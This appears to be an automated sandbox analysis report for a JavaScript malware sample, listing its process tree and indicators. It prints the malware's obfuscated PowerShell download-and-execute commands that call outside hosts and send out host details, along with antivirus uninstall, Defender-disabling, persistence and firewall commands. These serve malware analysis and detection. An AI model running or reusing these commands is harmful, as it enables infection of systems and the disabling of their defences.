taskmgr.exepid process 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
wscript.execmd.exepowershell.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1932 wrote to memory of 1528 1932 wscript.exe cmd.exe PID 1932 wrote to memory of 1528 1932 wscript.exe cmd.exe PID 1932 wrote to memory of 1528 1932 wscript.exe cmd.exe PID 1528 wrote to memory of 896 1528 cmd.exe notepad.exe PID 1528 wrote to memory of 896 1528 cmd.exe notepad.exe PID 1528 wrote to memory of 896 1528 cmd.exe notepad.exe PID 1528 wrote to memory of 1180 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 1180 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 1180 1528 cmd.exe powershell.exe PID 1180 wrote to memory of 760 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 760 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 760 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 1948 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 1948 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 1948 1180 powershell.exe cmd.exe PID 1948 wrote to memory of 1564 1948 cmd.exe WMIC.exe PID 1948 wrote to memory of 1564 1948 cmd.exe WMIC.exe PID 1948 wrote to memory of 1564 1948 cmd.exe WMIC.exe PID 1180 wrote to memory of 1812 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 1812 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 1812 1180 powershell.exe cmd.exe PID 1812 wrote to memory of 1664 1812 cmd.exe WMIC.exe PID 1812 wrote to memory of 1664 1812 cmd.exe WMIC.exe PID 1812 wrote to memory of 1664 1812 cmd.exe WMIC.exe PID 1180 wrote to memory of 1852 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 1852 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 1852 1180 powershell.exe cmd.exe PID 1852 wrote to memory of 1092 1852 cmd.exe WMIC.exe PID 1852 wrote to memory of 1092 1852 cmd.exe WMIC.exe PID 1852 wrote to memory of 1092 1852 cmd.exe WMIC.exe PID 1180 wrote to memory of 2028 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 2028 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 2028 1180 powershell.exe cmd.exe PID 2028 wrote to memory of 1172 2028 cmd.exe WMIC.exe PID 2028 wrote to memory of 1172 2028 cmd.exe WMIC.exe PID 2028 wrote to memory of 1172 2028 cmd.exe WMIC.exe PID 1180 wrote to memory of 1580 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 1580 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 1580 1180 powershell.exe cmd.exe PID 1580 wrote to memory of 1696 1580 cmd.exe WMIC.exe PID 1580 wrote to memory of 1696 1580 cmd.exe WMIC.exe PID 1580 wrote to memory of 1696 1580 cmd.exe WMIC.exe PID 1180 wrote to memory of 1728 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 1728 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 1728 1180 powershell.exe cmd.exe PID 1728 wrote to memory of 1644 1728 cmd.exe WMIC.exe PID 1728 wrote to memory of 1644 1728 cmd.exe WMIC.exe PID 1728 wrote to memory of 1644 1728 cmd.exe WMIC.exe PID 1180 wrote to memory of 1348 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 1348 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 1348 1180 powershell.exe cmd.exe PID 1348 wrote to memory of 1204 1348 cmd.exe WMIC.exe PID 1348 wrote to memory of 1204 1348 cmd.exe WMIC.exe PID 1348 wrote to memory of 1204 1348 cmd.exe WMIC.exe PID 1180 wrote to memory of 872 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 872 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 872 1180 powershell.exe cmd.exe PID 1180 wrote to memory of 2072 1180 powershell.exe schtasks.exe PID 1180 wrote to memory of 2072 1180 powershell.exe schtasks.exe PID 1180 wrote to memory of 2072 1180 powershell.exe schtasks.exe PID 1180 wrote to memory of 2112 1180 powershell.exe schtasks.exe PID 1180 wrote to memory of 2112 1180 powershell.exe schtasks.exe PID 1180 wrote to memory of 2112 1180 powershell.exe schtasks.exe PID 1180 wrote to memory of 2296 1180 powershell.exe schtasks.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\readme.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b notepad C:\Users\Admin\AppData\Local\Temp\readme.js & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*EIDQHRRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\notepad.exenotepad C:\Users\Admin\AppData\Local\Temp\readme.js3⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*EIDQHRRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo Set-MpPreference -DisableRealtimeMonitoring 14⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Eset%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%avast%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%avp%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Security%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \5E73AscDe2d /F /tr "powershell -w hidden -c PS_CMD"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn \5E73AscDe2d4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn tw6XxSsGFpu\TBOf76Y /F /tr "powershell -w hidden -c PS_CMD"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn tw6XxSsGFpu\TBOf76Y4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\rDpfKEdQXP\qCRJcTpUK /F /tr "powershell -w hidden -c PS_CMD"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\rDpfKEdQXP\qCRJcTpUK4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c netsh.exe firewall add portopening tcp 65529 SDNSd4⤵
-
C:\Windows\system32\netsh.exenetsh.exe firewall add portopening tcp 65529 SDNSd5⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=534⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block4⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F4⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {6C3F046A-A24A-450C-8E89-71042E45AF3C} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?mail_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|biJkcCEA.exe -3⤵
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exebiJkcCEA.exe -4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\f5hj1zbh\f5hj1zbh.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES279D.tmp" "c:\Windows\Temp\f5hj1zbh\CSCC9AA070B58D04584A89E871DCB5677EF.TMP"6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\nmvk3spo\nmvk3spo.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES2F3B.tmp" "c:\Windows\Temp\nmvk3spo\CSC7FDDEC82A16F489D8239AB599BAC44.TMP"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\cfmypwl0\cfmypwl0.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RESE531.tmp" "c:\Windows\Temp\cfmypwl0\CSCEBFE6450C2224554919A2F1BB96461F.TMP"7⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\ruaz535h\ruaz535h.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RESB7DA.tmp" "c:\Windows\Temp\ruaz535h\CSC228D84EF599C4C40B0A4591652A9E121.TMP"6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\frp2jgjf\frp2jgjf.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES35C0.tmp" "c:\Windows\Temp\frp2jgjf\CSCFB632C7FC5C4E23AEA7715F7D6C75D2.TMP"6⤵
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /all5⤵
- Gathers network information
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /displaydns5⤵
- Gathers network information
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -ano5⤵
- Gathers network information
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|biJkcCEA.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe3⤵
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^|Get-Random -Count 100));test1 -PEBytes $bin"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exebiJkcCEA.exe -4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2788 -s 18765⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c copy /y C:\Windows\TEMP\m6.bin.ori C:\Windows\TEMP\m6.bin.exe4⤵
-
C:\Windows\TEMP\m6.bin.exeC:\Windows\TEMP\m6.bin.exe4⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|biJkcCEA.exe -3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exebiJkcCEA.exe -4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\j3wn4yby\j3wn4yby.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RESD72D.tmp" "c:\Windows\Temp\j3wn4yby\CSCAFD0837FE44847118E3FE9B1E05923A5.TMP"6⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config xWinWpdSrv Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop xWinWpdSrv5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete xWinWpdSrv5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SVSHost Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SVSHost5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SVSHost5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "Microsoft Telemetry" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "Microsoft Telemetry"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "Microsoft Telemetry"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config lsass Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop lsass5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete lsass5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Microsoft Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Microsoft5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Microsoft5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config system Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop system5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete system5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Oracleupdate Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Oracleupdate5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Oracleupdate5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config CLR Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop CLR5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete CLR5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config sysmgt Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop sysmgt5⤵
-
